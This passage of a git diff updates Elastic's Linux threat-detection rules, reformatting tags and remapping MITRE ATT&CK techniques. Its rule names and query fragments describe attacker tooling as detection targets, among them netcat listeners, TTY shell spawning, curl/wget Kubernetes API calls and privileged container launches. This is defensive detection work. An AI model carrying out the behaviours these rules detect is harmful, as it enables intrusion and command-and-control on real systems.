"https://attack.mitre.org/tactics/TA0002/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1048" -name = "Exfiltration Over Alternative Protocol" -reference = "https://attack.mitre.org/techniques/T1048/" - -[rule.threat.tactic] -id = "TA0010" -name = "Exfiltration" -reference = "https://attack.mitre.org/tactics/TA0010/" diff --git a/rules/linux/execution_kubectl_apply_pod_from_url.toml b/rules/linux/execution_kubectl_apply_pod_from_url.toml index 28f2960a711..7358ddd13d1 100644 --- a/rules/linux/execution_kubectl_apply_pod_from_url.toml +++ b/rules/linux/execution_kubectl_apply_pod_from_url.toml @@ -4,7 +4,7 @@ integration = ["endpoint", "crowdstrike", "sentinel_one_cloud_funnel", "auditd_m maturity = "production" min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0" min_stack_version = "9.3.0" -updated_date = "2026/03/23" +updated_date = "2026/02/05" [rule] author = ["Elastic"] @@ -116,16 +116,16 @@ not process.args like~ ("*download.elastic.co*", "*github.com/kubernetes-sigs/*" [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1609" -name = "Container Administration Command" -reference = "https://attack.mitre.org/techniques/T1609/" - [[rule.threat.technique]] id = "T1610" name = "Deploy Container" reference = "https://attack.mitre.org/techniques/T1610/" +[[rule.threat.technique]] +id = "T1609" +name = "Container Administration Command" +reference = "https://attack.mitre.org/techniques/T1609/" + [rule.threat.tactic] id = "TA0002" name = "Execution" diff --git a/rules/linux/execution_kubernetes_direct_api_request_via_curl_or_wget.toml b/rules/linux/execution_kubernetes_direct_api_request_via_curl_or_wget.toml index 228072a8a57..15462abd9f1 100644 --- a/rules/linux/execution_kubernetes_direct_api_request_via_curl_or_wget.toml +++ b/rules/linux/execution_kubernetes_direct_api_request_via_curl_or_wget.toml @@ -4,7 +4,7 @@ integration = ["endpoint", "crowdstrike", "sentinel_one_cloud_funnel", "auditd_m maturity = "production" min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0" min_stack_version = "9.3.0" -updated_date = "2026/03/23" +updated_date = "2026/02/05" [rule] author = ["Elastic"] @@ -91,7 +91,22 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "medium" -tags = ["Domain: Endpoint", "Domain: Container", "Domain: Kubernetes", "OS: Linux", "Use Case: Threat Detection", "Tactic: Credential Access", "Tactic: Discovery", "Data Source: Auditd Manager", "Data Source: Elastic Defend", "Data Source: Elastic Endgame", "Data Source: Crowdstrike", "Data Source: SentinelOne", "Data Source: Elastic Defend for Containers", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "Domain: Container", + "Domain: Kubernetes", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Execution", + "Tactic: Discovery", + "Data Source: Auditd Manager", + "Data Source: Elastic Defend", + "Data Source: Elastic Endgame", + "Data Source: Crowdstrike", + "Data Source: SentinelOne", + "Data Source: Elastic Defend for Containers", + "Resources: Investigation Guide" +] timestamp_override = "event.ingested" type = "eql" query = ''' @@ -112,19 +127,19 @@ process.name in ("curl", "wget") and process.args like~ ( framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1552" -name = "Unsecured Credentials" -reference = "https://attack.mitre.org/techniques/T1552/" +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" [[rule.threat.technique.subtechnique]] -id = "T1552.007" -name = "Container API" -reference = "https://attack.mitre.org/techniques/T1552/007/" +id = "T1059.004" +name = "Unix Shell" +reference = "https://attack.mitre.org/techniques/T1059/004/" [rule.threat.tactic] -id = "TA0006" -name = "Credential Access" -reference = "https://attack.mitre.org/tactics/TA0006/" +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" [[rule.threat]] framework = "MITRE ATT&CK" diff --git a/rules/linux/execution_nc_listener_via_rlwrap.toml b/rules/linux/execution_nc_listener_via_rlwrap.toml index 0e630db8bb7..7e6e8f09bbf 100644 --- a/rules/linux/execution_nc_listener_via_rlwrap.toml +++ b/rules/linux/execution_nc_listener_via_rlwrap.toml @@ -2,7 +2,7 @@ creation_date = "2023/09/22" integration = ["endpoint", "crowdstrike", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/18" [rule] author = ["Elastic"] @@ -91,7 +91,17 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "medium" -tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Command and Control", "Data Source: Elastic Defend", "Data Source: Elastic Endgame", "Data Source: Crowdstrike", "Data Source: SentinelOne", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Execution", + "Data Source: Elastic Defend", + "Data Source: Elastic Endgame", + "Data Source: Crowdstrike", + "Data Source: SentinelOne", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" query = ''' @@ -105,11 +115,16 @@ process where host.os.type == "linux" and event.type == "start" and framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1095" -name = "Non-Application Layer Protocol" -reference = "https://attack.mitre.org/techniques/T1095/" +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.004" +name = "Unix Shell" +reference = "https://attack.mitre.org/techniques/T1059/004/" [rule.threat.tactic] -id = "TA0011" -name = "Command and Control" -reference = "https://attack.mitre.org/tactics/TA0011/" +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules/linux/execution_netcon_from_rwx_mem_region_binary.toml b/rules/linux/execution_netcon_from_rwx_mem_region_binary.toml index 3ad4d30131f..b094488daa9 100644 --- a/rules/linux/execution_netcon_from_rwx_mem_region_binary.toml +++ b/rules/linux/execution_netcon_from_rwx_mem_region_binary.toml @@ -2,7 +2,7 @@ creation_date = "2024/03/13" integration = ["auditd_manager", "endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/18" [rule] author = ["Elastic"] @@ -43,7 +43,15 @@ For this detection rule to trigger, the following additional audit rules are req Add the newly installed `auditd manager` to an agent policy, and deploy the agent on a Linux system from which auditd log files are desirable. """ severity = "medium" -tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Tactic: Execution", "Data Source: Elastic Defend", "Data Source: Auditd Manager", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Execution", + "Data Source: Elastic Defend", + "Data Source: Auditd Manager", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" query = ''' @@ -94,24 +102,29 @@ In Linux environments, the `mprotect()` system call adjusts memory permissions, framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1620" -name = "Reflective Code Loading" -reference = "https://attack.mitre.org/techniques/T1620/" +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.004" +name = "Unix Shell" +reference = "https://attack.mitre.org/techniques/T1059/004/" [rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" [[rule.threat]] framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1106" -name = "Native API" -reference = "https://attack.mitre.org/techniques/T1106/" +id = "T1071" +name = "Application Layer Protocol" +reference = "https://attack.mitre.org/techniques/T1071/" [rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" +id = "TA0011" +name = "Command and Control" +reference = "https://attack.mitre.org/tactics/TA0011/" diff --git a/rules/linux/execution_network_event_post_compilation.toml b/rules/linux/execution_network_event_post_compilation.toml index 1ab588e751b..42342789d2f 100644 --- a/rules/linux/execution_network_event_post_compilation.toml +++ b/rules/linux/execution_network_event_post_compilation.toml @@ -2,7 +2,7 @@ creation_date = "2023/08/28" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/18" [rule] author = ["Elastic"] @@ -44,7 +44,14 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "medium" -tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Command and Control", "Tactic: Defense Evasion", "Data Source: Elastic Defend", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Execution", + "Data Source: Elastic Defend", + "Resources: Investigation Guide", +] type = "eql" query = ''' sequence by host.id with maxspan=1m @@ -106,29 +113,29 @@ In Linux environments, compiling and executing programs is routine for developme framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1095" -name = "Non-Application Layer Protocol" -reference = "https://attack.mitre.org/techniques/T1095/" +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.004" +name = "Unix Shell" +reference = "https://attack.mitre.org/techniques/T1059/004/" [rule.threat.tactic] -id = "TA0011" -name = "Command and Control" -reference = "https://attack.mitre.org/tactics/TA0011/" +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" [[rule.threat]] framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1027" -name = "Obfuscated Files or Information" -reference = "https://attack.mitre.org/techniques/T1027/" - -[[rule.threat.technique.subtechnique]] -id = "T1027.004" -name = "Compile After Delivery" -reference = "https://attack.mitre.org/techniques/T1027/004/" +id = "T1071" +name = "Application Layer Protocol" +reference = "https://attack.mitre.org/techniques/T1071/" [rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" +id = "TA0011" +name = "Command and Control" +reference = "https://attack.mitre.org/tactics/TA0011/" diff --git a/rules/linux/execution_perl_tty_shell.toml b/rules/linux/execution_perl_tty_shell.toml index 24093ae8322..fdf0986337e 100644 --- a/rules/linux/execution_perl_tty_shell.toml +++ b/rules/linux/execution_perl_tty_shell.toml @@ -2,7 +2,7 @@ creation_date = "2020/04/16" integration = ["endpoint", "auditd_manager", "crowdstrike", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/19" [rule] author = ["Elastic"] @@ -130,11 +130,6 @@ id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" -[[rule.threat.technique.subtechnique]] -id = "T1059.004" -name = "Unix Shell" -reference = "https://attack.mitre.org/techniques/T1059/004/" - [rule.threat.tactic] id = "TA0002" name = "Execution" diff --git a/rules/linux/execution_potential_hack_tool_executed.toml b/rules/linux/execution_potential_hack_tool_executed.toml index d875a90451b..c3d550b7b8b 100644 --- a/rules/linux/execution_potential_hack_tool_executed.toml +++ b/rules/linux/execution_potential_hack_tool_executed.toml @@ -2,7 +2,7 @@ creation_date = "2023/09/22" integration = ["endpoint", "auditd_manager", "crowdstrike", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/20" [rule] author = ["Elastic"] @@ -87,7 +87,18 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "medium" -tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Credential Access", "Tactic: Discovery", "Tactic: Initial Access", "Tactic: Reconnaissance", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Auditd Manager", "Data Source: Crowdstrike", "Data Source: SentinelOne", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Execution", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Auditd Manager", + "Data Source: Crowdstrike", + "Data Source: SentinelOne", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" @@ -117,86 +128,8 @@ process.name in~ ( [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1110" -name = "Brute Force" -reference = "https://attack.mitre.org/techniques/T1110/" - -[[rule.threat.technique.subtechnique]] -id = "T1110.001" -name = "Password Guessing" -reference = "https://attack.mitre.org/techniques/T1110/001/" - -[[rule.threat.technique.subtechnique]] -id = "T1110.002" -name = "Password Cracking" -reference = "https://attack.mitre.org/techniques/T1110/002/" - -[rule.threat.tactic] -id = "TA0006" -name = "Credential Access" -reference = "https://attack.mitre.org/tactics/TA0006/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1046" -name = "Network Service Discovery" -reference = "https://attack.mitre.org/techniques/T1046/" - -[[rule.threat.technique]] -id = "T1057" -name = "Process Discovery" -reference = "https://attack.mitre.org/techniques/T1057/" - -[[rule.threat.technique]] -id = "T1082" -name = "System Information Discovery" -reference = "https://attack.mitre.org/techniques/T1082/" - -[rule.threat.tactic] -id = "TA0007" -name = "Discovery" -reference = "https://attack.mitre.org/tactics/TA0007/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1190" -name = "Exploit Public-Facing Application" -reference = "https://attack.mitre.org/techniques/T1190/" - [rule.threat.tactic] -id = "TA0001" -name = "Initial Access" -reference = "https://attack.mitre.org/tactics/TA0001/" +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1595" -name = "Active Scanning" -reference = "https://attack.mitre.org/techniques/T1595/" - -[[rule.threat.technique.subtechnique]] -id = "T1595.001" -name = "Scanning IP Blocks" -reference = "https://attack.mitre.org/techniques/T1595/001/" - -[[rule.threat.technique.subtechnique]] -id = "T1595.002" -name = "Vulnerability Scanning" -reference = "https://attack.mitre.org/techniques/T1595/002/" - -[[rule.threat.technique.subtechnique]] -id = "T1595.003" -name = "Wordlist Scanning" -reference = "https://attack.mitre.org/techniques/T1595/003/" - -[rule.threat.tactic] -id = "TA0043" -name = "Reconnaissance" -reference = "https://attack.mitre.org/tactics/TA0043/" diff --git a/rules/linux/execution_potentially_overly_permissive_container_creation.toml b/rules/linux/execution_potentially_overly_permissive_container_creation.toml index 2fcd60481d8..69ded33a6ec 100644 --- a/rules/linux/execution_potentially_overly_permissive_container_creation.toml +++ b/rules/linux/execution_potentially_overly_permissive_container_creation.toml @@ -2,7 +2,7 @@ creation_date = "2024/07/10" integration = ["endpoint", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/18" [rule] author = ["Elastic"] @@ -85,7 +85,17 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "medium" -tags = ["Domain: Endpoint", "Domain: Container", "OS: Linux", "Use Case: Threat Detection", "Tactic: Execution", "Tactic: Privilege Escalation", "Data Source: Elastic Defend", "Data Source: Elastic Endgame", "Data Source: SentinelOne", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "Domain: Container", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Execution", + "Data Source: Elastic Defend", + "Data Source: Elastic Endgame", + "Data Source: SentinelOne", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "new_terms" query = ''' @@ -97,6 +107,16 @@ process.name:docker and process.args:(run and --privileged) [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.004" +name = "Unix Shell" +reference = "https://attack.mitre.org/techniques/T1059/004/" + [[rule.threat.technique]] id = "T1609" name = "Container Administration Command" @@ -119,6 +139,7 @@ reference = "https://attack.mitre.org/techniques/T1611/" id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" + [rule.new_terms] field = "new_terms_fields" value = ["process.parent.executable"] diff --git a/rules/linux/execution_process_backgrounded_by_unusual_parent.toml b/rules/linux/execution_process_backgrounded_by_unusual_parent.toml index 535e1497a84..b89fc96dc27 100644 --- a/rules/linux/execution_process_backgrounded_by_unusual_parent.toml +++ b/rules/linux/execution_process_backgrounded_by_unusual_parent.toml @@ -2,7 +2,7 @@ creation_date = "2025/01/29" integration = ["endpoint", "crowdstrike", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/18" [rule] author = ["Elastic"] @@ -94,7 +94,18 @@ Auditbeat is a lightweight shipper that you can install on your servers to audit - For complete “Setup and Run Auditbeat” information refer to the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setting-up-and-running.html). """ severity = "low" -tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Tactic: Execution", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Crowdstrike", "Data Source: SentinelOne", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Execution", + "Tactic: Persistence", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Crowdstrike", + "Data Source: SentinelOne", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "new_terms" query = ''' @@ -109,37 +120,28 @@ not process.parent.name:(sshd or make or su or ds_agent or fortitraylauncher or framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1036" -name = "Masquerading" -reference = "https://attack.mitre.org/techniques/T1036/" - -[[rule.threat.technique.subtechnique]] -id = "T1036.009" -name = "Break Process Trees" -reference = "https://attack.mitre.org/techniques/T1036/009/" +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" [rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" [[rule.threat]] framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1059" -name = "Command and Scripting Interpreter" -reference = "https://attack.mitre.org/techniques/T1059/" - -[[rule.threat.technique.subtechnique]] -id = "T1059.004" -name = "Unix Shell" -reference = "https://attack.mitre.org/techniques/T1059/004/" +id = "T1564" +name = "Hide Artifacts" +reference = "https://attack.mitre.org/techniques/T1564/" [rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + [rule.new_terms] field = "new_terms_fields" value = ["process.parent.name"] diff --git a/rules/linux/execution_process_started_from_process_id_file.toml b/rules/linux/execution_process_started_from_process_id_file.toml index 121dd0f3510..9188badd565 100644 --- a/rules/linux/execution_process_started_from_process_id_file.toml +++ b/rules/linux/execution_process_started_from_process_id_file.toml @@ -2,7 +2,7 @@ creation_date = "2022/05/11" integration = ["endpoint", "auditd_manager", "crowdstrike"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/02/04" [rule] author = ["Elastic"] @@ -65,7 +65,18 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "high" -tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Threat: BPFDoor", "Tactic: Defense Evasion", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Auditd Manager", "Data Source: Crowdstrike", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Execution", + "Threat: BPFDoor", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Auditd Manager", + "Data Source: Crowdstrike", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" @@ -77,18 +88,14 @@ process where host.os.type == "linux" and event.type == "start" and user.id == " [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1036" -name = "Masquerading" -reference = "https://attack.mitre.org/techniques/T1036/" +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" -[[rule.threat.technique.subtechnique]] -id = "T1036.008" -name = "Masquerade File Type" -reference = "https://attack.mitre.org/techniques/T1036/008/" [rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" + diff --git a/rules/linux/execution_process_started_in_shared_memory_directory.toml b/rules/linux/execution_process_started_in_shared_memory_directory.toml index 856d4737fb0..1f0801f42f1 100644 --- a/rules/linux/execution_process_started_in_shared_memory_directory.toml +++ b/rules/linux/execution_process_started_in_shared_memory_directory.toml @@ -2,7 +2,7 @@ creation_date = "2022/05/10" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/18" [rule] author = ["Elastic"] @@ -56,7 +56,16 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "high" -tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Threat: BPFDoor", "Tactic: Defense Evasion", "Tactic: Execution", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Execution", + "Threat: BPFDoor", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" query = ''' @@ -111,22 +120,9 @@ Shared memory directories in Linux, such as /dev/shm and /run/shm, are designed framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1564" -name = "Hide Artifacts" -reference = "https://attack.mitre.org/techniques/T1564/" - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1106" -name = "Native API" -reference = "https://attack.mitre.org/techniques/T1106/" +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" [rule.threat.tactic] id = "TA0002" diff --git a/rules/linux/execution_python_tty_shell.toml b/rules/linux/execution_python_tty_shell.toml index 739358a6ff2..c8eff177979 100644 --- a/rules/linux/execution_python_tty_shell.toml +++ b/rules/linux/execution_python_tty_shell.toml @@ -2,7 +2,7 @@ creation_date = "2020/04/15" integration = ["endpoint", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/18" [rule] author = ["Elastic"] @@ -117,11 +117,6 @@ id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" -[[rule.threat.technique.subtechnique]] -id = "T1059.004" -name = "Unix Shell" -reference = "https://attack.mitre.org/techniques/T1059/004/" - [[rule.threat.technique.subtechnique]] id = "T1059.006" name = "Python" diff --git a/rules/linux/execution_python_webserver_spawned.toml b/rules/linux/execution_python_webserver_spawned.toml index 6306061e099..5f6a9442737 100644 --- a/rules/linux/execution_python_webserver_spawned.toml +++ b/rules/linux/execution_python_webserver_spawned.toml @@ -2,7 +2,7 @@ creation_date = "2024/11/04" integration = ["endpoint", "crowdstrike", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/19" [rule] author = ["Elastic"] @@ -126,3 +126,16 @@ reference = "https://attack.mitre.org/techniques/T1059/006/" id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1570" +name = "Lateral Tool Transfer" +reference = "https://attack.mitre.org/techniques/T1570/" + +[rule.threat.tactic] +id = "TA0008" +name = "Lateral Movement" +reference = "https://attack.mitre.org/tactics/TA0008/" diff --git a/rules/linux/execution_shell_evasion_linux_binary.toml b/rules/linux/execution_shell_evasion_linux_binary.toml index 60af7276a56..a1fd996d20e 100644 --- a/rules/linux/execution_shell_evasion_linux_binary.toml +++ b/rules/linux/execution_shell_evasion_linux_binary.toml @@ -2,7 +2,7 @@ creation_date = "2022/05/06" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/11" [rule] author = ["Elastic"] @@ -126,7 +126,15 @@ Session View uses process data collected by the Elastic Defend integration, but For more information about the additional fields collected when this setting is enabled and the usage of Session View for Analysis refer to the [helper guide](https://www.elastic.co/guide/en/security/current/session-view.html). """ severity = "medium" -tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Tactic: Execution", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Execution", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" @@ -186,31 +194,19 @@ process where host.os.type == "linux" and event.type == "start" and process.exec [[rule.threat]] framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1202" -name = "Indirect Command Execution" -reference = "https://attack.mitre.org/techniques/T1202/" - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" - [[rule.threat.technique.subtechnique]] id = "T1059.004" name = "Unix Shell" reference = "https://attack.mitre.org/techniques/T1059/004/" + + [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" + diff --git a/rules/linux/execution_shell_openssl_client_or_server.toml b/rules/linux/execution_shell_openssl_client_or_server.toml index 59e7bcf2dd8..b57a9c5ebbe 100644 --- a/rules/linux/execution_shell_openssl_client_or_server.toml +++ b/rules/linux/execution_shell_openssl_client_or_server.toml @@ -2,7 +2,7 @@ creation_date = "2024/07/30" integration = ["endpoint", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/19" [rule] author = ["Elastic"] @@ -79,7 +79,16 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "medium" -tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Command and Control", "Data Source: Elastic Defend", "Data Source: Elastic Endgame", "Data Source: SentinelOne", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Execution", + "Data Source: Elastic Defend", + "Data Source: Elastic Endgame", + "Data Source: SentinelOne", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" query = ''' @@ -105,14 +114,27 @@ not process.parent.executable in ( framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1573" -name = "Encrypted Channel" -reference = "https://attack.mitre.org/techniques/T1573/" +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" [[rule.threat.technique.subtechnique]] -id = "T1573.002" -name = "Asymmetric Cryptography" -reference = "https://attack.mitre.org/techniques/T1573/002/" +id = "T1059.004" +name = "Unix Shell" +reference = "https://attack.mitre.org/techniques/T1059/004/" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1071" +name = "Application Layer Protocol" +reference = "https://attack.mitre.org/techniques/T1071/" [rule.threat.tactic] id = "TA0011" diff --git a/rules/linux/execution_shell_via_background_process.toml b/rules/linux/execution_shell_via_background_process.toml index 4565044ed1e..71f6934441f 100644 --- a/rules/linux/execution_shell_via_background_process.toml +++ b/rules/linux/execution_shell_via_background_process.toml @@ -2,7 +2,7 @@ creation_date = "2023/09/20" integration = ["endpoint", "crowdstrike", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/19" [rule] author = ["Elastic"] @@ -83,7 +83,17 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "high" -tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Command and Control", "Tactic: Execution", "Data Source: Elastic Defend", "Data Source: Elastic Endgame", "Data Source: Crowdstrike", "Data Source: SentinelOne", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Execution", + "Data Source: Elastic Defend", + "Data Source: Elastic Endgame", + "Data Source: Crowdstrike", + "Data Source: SentinelOne", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = 